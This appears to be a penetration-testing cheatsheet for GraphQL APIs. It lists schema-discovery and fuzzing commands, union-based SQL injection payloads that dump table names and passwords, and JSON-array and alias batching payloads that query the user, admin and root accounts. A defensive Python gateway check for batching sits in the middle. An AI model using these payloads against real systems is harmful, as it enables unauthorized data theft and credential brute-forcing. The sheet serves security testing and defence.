GraphQL
Checklist
# GraphQL suggestions
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
# Fuzzing queries
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
# JSON list-based batching
[
{"query":"{user(username: \"user\") {id,name,password}}"},
{"query":"{user(username: \"admin\") {id,name,password}}"},
{"query":"{user(username: \"root\") {id,name,password}}"}
]
# Query-name (alias) based batching
{"query":"{
first: user(username:\"user\"){id,name,password}
second: user(username:\"admin\") {id,name,password}
third: user(username:\"root\") {id,name,password}
}"}
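Both batching shapes above are what a defender wants to spot at the gateway. As an added example (not part of this cheatsheet and not code from any tool listed here), the Python check below classifies an incoming GraphQL POST body as JSON-array batching, alias batching or allowed; the policy limits, the lightweight selection-set scanner and the sample bodies are constructed for illustration.

```python
import json
import re

MAX_BATCH_OPERATIONS = 1   # constructed policy: reject JSON-array batching outright
MAX_TOP_LEVEL_FIELDS = 2   # constructed policy: cap aliased top-level selections

_NAME = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")
_ALIAS_TAIL = re.compile(r"\s*:\s*[_A-Za-z][_0-9A-Za-z]*")   # ": field" after an alias
_STRING = re.compile(r'"(?:\\.|[^"\\])*"?')                  # string literal with escapes

def top_level_fields(query):
    """Alias (or field name) of each top-level selection in the first selection set.
    Braces, parentheses, strings and directives are tracked so username:"x{" is harmless."""
    fields, i, brace, paren = [], 0, 0, 0
    while i < len(query):
        c = query[i]
        if c == '"':
            i = _STRING.match(query, i).end()
            continue
        if c in "{}()":
            brace += (c == "{") - (c == "}")
            paren += (c == "(") - (c == ")")
            if brace == 0 and fields:                # first selection set closed
                break
            i += 1
            continue
        if c == "@":                                 # directive: skip its name
            m = _NAME.match(query, i + 1)
            i = m.end() if m else i + 1
            continue
        m = _NAME.match(query, i) if brace == 1 and paren == 0 else None
        if not m:
            i += 1
            continue
        fields.append(m.group())
        tail = _ALIAS_TAIL.match(query, m.end())     # "alias: field": keep alias, skip field
        i = tail.end() if tail else m.end()
    return fields

def inspect_request(body):
    """Classify one raw POST body as array batching, alias batching or allowed."""
    data = json.loads(body)
    ops = [op for op in (data if isinstance(data, list) else [data]) if isinstance(op, dict)]
    widest = max((len(top_level_fields(op.get("query", ""))) for op in ops), default=0)
    verdict = ("reject: array batching" if len(ops) > MAX_BATCH_OPERATIONS
               else "reject: alias batching" if widest > MAX_TOP_LEVEL_FIELDS else "allow")
    return {"operations": len(ops), "top_level_fields": widest, "verdict": verdict}
# Constructed request bodies mirroring the two batching shapes shown above.
ARRAY_BATCH = r'[{"query":"{user(username: \"user\") {id}}"},{"query":"{user(username: \"admin\") {id}}"}]'
ALIAS_BATCH = r'{"query":"{\nfirst: user(username:\"user\"){id}\nsecond: user(username:\"admin\") {id}\nthird: user(username:\"root\") {id}\n}"}'
```

A per-user rate limit on rejected bodies, rather than a bare 400, is what turns this check into a useful brute-force signal in logs.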
Tools
Clairvoyance
clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
graphw00f
main.py -d -f -t <target>
GraphQL Cop
graphql-cop.py -t <target>/graphql
GraphQLmap
graphqlmap.py -u <target>/graphql
InQL
GraphQL Voyager
Altair GraphQL Client
Wordlists